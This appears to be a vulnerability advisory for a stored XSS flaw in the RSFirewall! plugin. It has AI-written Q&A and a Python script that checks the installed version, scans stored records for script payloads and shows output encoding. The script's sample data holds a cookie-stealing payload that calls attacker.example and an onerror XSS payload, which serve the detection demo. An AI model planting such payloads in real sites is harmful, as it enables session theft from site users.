CVE-2026-25341
Stored XSS in RSJoomla! RSFirewall! Allows Persistent Script Injection
Publication date: 2026-03-25
Last updated on: 2026-04-23
Assigner: Patchstack
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| rsjoomla | rsfirewall | Up to and including 1.1.45 |
| rsjoomla | rsfirewall | From 1.1.0 (inclusive) to 1.1.45 (inclusive) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability impact me?
This vulnerability lets an attacker inject script into your website in a way that the plugin stores and later renders, so the script executes in visitors' browsers.
Such scripts can redirect visitors to malicious sites, display unwanted advertisements, or steal sensitive information.
Because the injected code runs with the origin of your website, it can act on behalf of any user who loads the page where the stored payload is rendered, which can damage your site's reputation and lead to widespread exploitation.
Planting the payload does not require authentication, which increases the risk of attack.
Can you explain this vulnerability to me?
CVE-2026-25341 is a medium-severity stored Cross-Site Scripting (XSS) vulnerability affecting the WordPress RSFirewall! plugin in versions up to and including 1.1.45.
It allows attackers to inject malicious scripts (such as redirects, advertisements, or other HTML payloads) into websites running the affected plugin.
The stored scripts execute when someone loads the page on which the plugin renders the injected content, which makes the flaw attractive for mass-attack campaigns.
Planting the payload requires no authentication, but execution depends on interaction by a privileged user, such as opening the affected page, clicking a crafted link, or submitting a form.
The vulnerability falls under OWASP Top 10 category A03:2021 Injection, which covers XSS, and is classified as CWE-79.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This is a stored Cross-Site Scripting (XSS) issue in the RSFirewall! WordPress plugin in versions up to and including 1.1.45, so there are two things to detect: whether a site is still exposed, and whether a payload has already been stored.
The available resources give no specific commands. Exposure is confirmed by reading the installed plugin version (shown on the WordPress Plugins screen, or obtainable with WP-CLI) and comparing it with 1.1.45; an already stored payload is found by inspecting the data the plugin stores and later renders for script tags, event-handler attributes or javascript: URLs, or by running a web vulnerability scanner that tests for XSS.
Monitoring HTTP traffic for requests carrying script payloads, and using security tooling that flags exploitation attempts against RSFirewall! versions up to 1.1.45, helps catch the injection step as it happens.
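The two checks described above (is the installed version inside the affected range, and does stored data already carry a script payload), together with the output-encoding step that closes CWE-79, as an added example. This is not code from the advisory or from RSFirewall!; the version numbers are the ones on this page, but the plugin header, the log rows and the scenario in which a stored User-Agent is rendered unescaped to an administrator are constructed assumptions, not the confirmed vector for this CVE.

```python
"""Added example for CVE-2026-25341: is the installed plugin in the affected range,
and do the records it stores carry script payloads?  Versions come from the
advisory; the plugin header, the log rows and the 'User-Agent is rendered
unescaped' scenario are constructed assumptions, not RSFirewall!'s code."""
import html
import re
from html.parser import HTMLParser

AFFECTED_MAX = (1, 1, 45)   # "up to and including 1.1.45" per the advisory
FIXED_VERSION = (1, 1, 46)  # first release the advisory names as patched


def parse_version(text):
    """'1.1.45' -> (1, 1, 45); a non-numeric suffix such as '-beta' is ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", text))


def plugin_version_from_header(php_source):
    """Read the 'Version:' line of a WordPress plugin's main-file header.
    WordPress reads this header itself, so the format is real; the contents
    passed in below are constructed for the example."""
    m = re.search(r"^\s*\*?\s*Version:\s*(.+?)\s*$", php_source, re.M)
    return m.group(1) if m else None


def is_affected(version_string):
    """True when the version is inside the range the advisory lists."""
    return parse_version(version_string) <= AFFECTED_MAX


class _SinkFinder(HTMLParser):
    """Collect the constructs that turn stored text into executable markup."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")
            elif name in ("href", "src", "action") and value:
                if value.strip().lower().startswith("javascript:"):
                    self.findings.append(f"javascript: URL in {name}")

    handle_startendtag = handle_starttag


def scan_for_script(value):
    """Return the script-bearing constructs found in one stored value ([] if none)."""
    finder = _SinkFinder()
    finder.feed(value)
    finder.close()
    return finder.findings


def scan_rows(rows, fields):
    """Scan the given fields of every row; returns (row id, field, findings) per hit."""
    hits = []
    for row in rows:
        for field in fields:
            findings = scan_for_script(row.get(field, ""))
            if findings:
                hits.append((row["id"], field, findings))
    return hits


def neutralize(value):
    """The CWE-79 fix on the output side: encode before the value reaches HTML.
    In a WordPress plugin this is esc_html()/esc_attr(); html.escape stands in here."""
    return html.escape(value, quote=True)


# --- constructed sample input -------------------------------------------------
SAMPLE_PLUGIN_HEADER = """<?php
/**
 * Plugin Name: RSFirewall!
 * Version: 1.1.45
 */
"""

# Constructed log rows of the kind a firewall plugin might store and later show
# to an administrator; whether RSFirewall! renders User-Agent this way is an
# assumption, not a fact from the advisory.
SAMPLE_LOG_ROWS = [
    {"id": 1, "ip": "203.0.113.10", "user_agent": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"id": 2, "ip": "203.0.113.11",
     "user_agent": "<script>fetch('//attacker.example/?c='+document.cookie)</script>"},
    {"id": 3, "ip": "203.0.113.12", "user_agent": "<img src=x onerror=alert(document.domain)>"},
    {"id": 4, "ip": "203.0.113.13", "user_agent": "curl/8.5.0 <b>harmless markup</b>"},
]

if __name__ == "__main__":
    installed = plugin_version_from_header(SAMPLE_PLUGIN_HEADER)
    print(f"installed {installed}: {'AFFECTED' if is_affected(installed) else 'patched'}")
    for row_id, field, findings in scan_rows(SAMPLE_LOG_ROWS, ["user_agent"]):
        print(f"row {row_id} {field}: {', '.join(findings)}")
    # The same payload after output encoding no longer parses as markup.
    print(scan_for_script(neutralize(SAMPLE_LOG_ROWS[1]["user_agent"])))
```

On a live WordPress install, `wp plugin get <slug> --field=version` (the plugin slug is not stated on this page, so it is an assumption) returns the installed version to feed into `is_affected()`. Row 4 shows the scanner ignoring plain formatting markup; it is a triage aid, not proof of absence, since payloads can be split across fields or hidden in constructs it does not model.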
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation is to update the RSFirewall! plugin to version 1.1.46 or later, which contains the patch for this stored XSS; afterwards, confirm that the version WordPress reports for the plugin is 1.1.46 or higher.
If updating immediately is not possible, apply the automatic mitigation rule provided by Patchstack, which blocks requests targeting this vulnerability.
Users unable to update or apply the mitigation rule should seek assistance from their hosting provider or web developer.
Enabling auto-updates for the RSFirewall! plugin helps ensure timely protection against this and future vulnerabilities. Note that an update stops new injections but does not by itself remove payloads already stored; whether those still render depends on where the fix was applied, so review the plugin's stored data after updating.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided information does not specify how the CVE-2026-25341 vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.